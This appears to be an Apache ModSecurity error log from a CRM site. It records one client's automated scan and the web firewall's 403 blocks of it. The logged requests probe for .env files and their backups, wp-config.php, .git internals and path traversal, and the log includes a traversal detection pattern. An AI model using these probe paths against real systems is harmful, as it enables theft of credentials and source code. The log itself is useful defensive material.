[Mon May 11 15:23:11.458393 2026] [security2:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYP-JEyNRN152ArOSM1QAAAE0"]
[Mon May 11 15:23:11.458532 2026] [security2:error] [pid 1319953:tid 1319977] [client 195.178.110.133:2784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYP-SQ-m-m0ukSShuB-wAAAVY"]
[Mon May 11 15:23:11.458573 2026] [security2:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYP-JEyNRN152ArOSM1QAAAE0"]
[Mon May 11 15:23:11.458603 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYP6O9RdIr1DwxYR2StQAAAMk"]
[Mon May 11 15:23:11.458654 2026] [security2:error] [pid 1319953:tid 1319977] [client 195.178.110.133:2784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYP-SQ-m-m0ukSShuB-wAAAVY"]
[Mon May 11 15:23:11.458718 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYP6O9RdIr1DwxYR2StQAAAMk"]
[Mon May 11 15:23:11.458841 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYP1chVQ3tCn0m9OpZHwAAARI"]
[Mon May 11 15:23:11.458936 2026] [security2:error] [pid 1319953:tid 1319977] [client 195.178.110.133:2784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYP-SQ-m-m0ukSShuB-wAAAVY"]
[Mon May 11 15:23:11.458949 2026] [security2:error] [pid 1320674:tid 1320699] [client 195.178.110.133:2806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYP6O9RdIr1DwxYR2StQAAAMk"]
[Mon May 11 15:23:11.459336 2026] [core:error] [pid 1319886:tid 1319933] [client 195.178.110.133:2698] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:11.460252 2026] [security2:error] [pid 1320674:tid 1320695] [client 195.178.110.133:2738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYP6O9RdIr1DwxYR2StgAAAMU"]
[Mon May 11 15:23:11.460364 2026] [security2:error] [pid 1320674:tid 1320695] [client 195.178.110.133:2738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYP6O9RdIr1DwxYR2StgAAAMU"]
[Mon May 11 15:23:11.460541 2026] [security2:error] [pid 1320674:tid 1320695] [client 195.178.110.133:2738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHYP6O9RdIr1DwxYR2StgAAAMU"]
[Mon May 11 15:23:11.461687 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYP1chVQ3tCn0m9OpZIAAAAQs"]
[Mon May 11 15:23:11.461799 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYP1chVQ3tCn0m9OpZIAAAAQs"]
[Mon May 11 15:23:11.461983 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYP1chVQ3tCn0m9OpZIAAAAQs"]
[Mon May 11 15:23:11.462996 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYP6t2WtvoFr7xvGzUYwAAAJE"]
[Mon May 11 15:23:11.463110 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYP6t2WtvoFr7xvGzUYwAAAJE"]
[Mon May 11 15:23:11.463301 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYP6t2WtvoFr7xvGzUYwAAAJE"]
[Mon May 11 15:23:11.463449 2026] [security2:error] [pid 1319953:tid 1319972] [client 195.178.110.133:2716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_AAAAVE"]
[Mon May 11 15:23:11.463565 2026] [security2:error] [pid 1319953:tid 1319972] [client 195.178.110.133:2716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_AAAAVE"]
[Mon May 11 15:23:11.463933 2026] [security2:error] [pid 1319953:tid 1319972] [client 195.178.110.133:2716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_AAAAVE"]
[Mon May 11 15:23:11.465679 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_QAAAUE"]
[Mon May 11 15:23:11.465738 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_QAAAUE"]
[Mon May 11 15:23:11.465836 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_QAAAUE"]
[Mon May 11 15:23:11.466204 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYP6t2WtvoFr7xvGzUZAAAAJg"]
[Mon May 11 15:23:11.466231 2026] [security2:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-SQ-m-m0ukSShuB_QAAAUE"]
[Mon May 11 15:23:11.466320 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYP6t2WtvoFr7xvGzUZAAAAJg"]
[Mon May 11 15:23:11.466514 2026] [security2:error] [pid 1319998:tid 1320024] [client 195.178.110.133:2768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYP6t2WtvoFr7xvGzUZAAAAJg"]
[Mon May 11 15:23:11.467673 2026] [security2:error] [pid 1319886:tid 1319928] [client 195.178.110.133:2790] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYP6y-5-wpj6Sx56aYtwAAABI"]
[Mon May 11 15:23:11.467795 2026] [security2:error] [pid 1319886:tid 1319928] [client 195.178.110.133:2790] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYP6y-5-wpj6Sx56aYtwAAABI"]
[Mon May 11 15:23:11.467855 2026] [access_compat:error] [pid 1319998:tid 1320008] [client 195.178.110.133:2684] AH01797: client denied by server configuration: /home/tcttelec/crm.tct-telecom.fr/storage/.env
[Mon May 11 15:23:11.468104 2026] [security2:error] [pid 1319886:tid 1319928] [client 195.178.110.133:2790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYP6y-5-wpj6Sx56aYtwAAABI"]
[Mon May 11 15:23:11.472729 2026] [security2:error] [pid 1320398:tid 1320412] [client 195.178.110.133:2712] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYP-JEyNRN152ArOSM1wAAAEw"]
[Mon May 11 15:23:11.472851 2026] [security2:error] [pid 1320398:tid 1320412] [client 195.178.110.133:2712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYP-JEyNRN152ArOSM1wAAAEw"]
[Mon May 11 15:23:11.473348 2026] [security2:error] [pid 1320398:tid 1320412] [client 195.178.110.133:2712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYP-JEyNRN152ArOSM1wAAAEw"]
[Mon May 11 15:23:11.473543 2026] [security2:error] [pid 1319885:tid 1319896] [client 195.178.110.133:2764] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYP1chVQ3tCn0m9OpZIQAAAQc"]
[Mon May 11 15:23:11.473654 2026] [security2:error] [pid 1319885:tid 1319896] [client 195.178.110.133:2764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYP1chVQ3tCn0m9OpZIQAAAQc"]
[Mon May 11 15:23:11.473825 2026] [security2:error] [pid 1319885:tid 1319896] [client 195.178.110.133:2764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYP1chVQ3tCn0m9OpZIQAAAQc"]
[Mon May 11 15:23:11.474927 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYP1chVQ3tCn0m9OpZIgAAARI"]
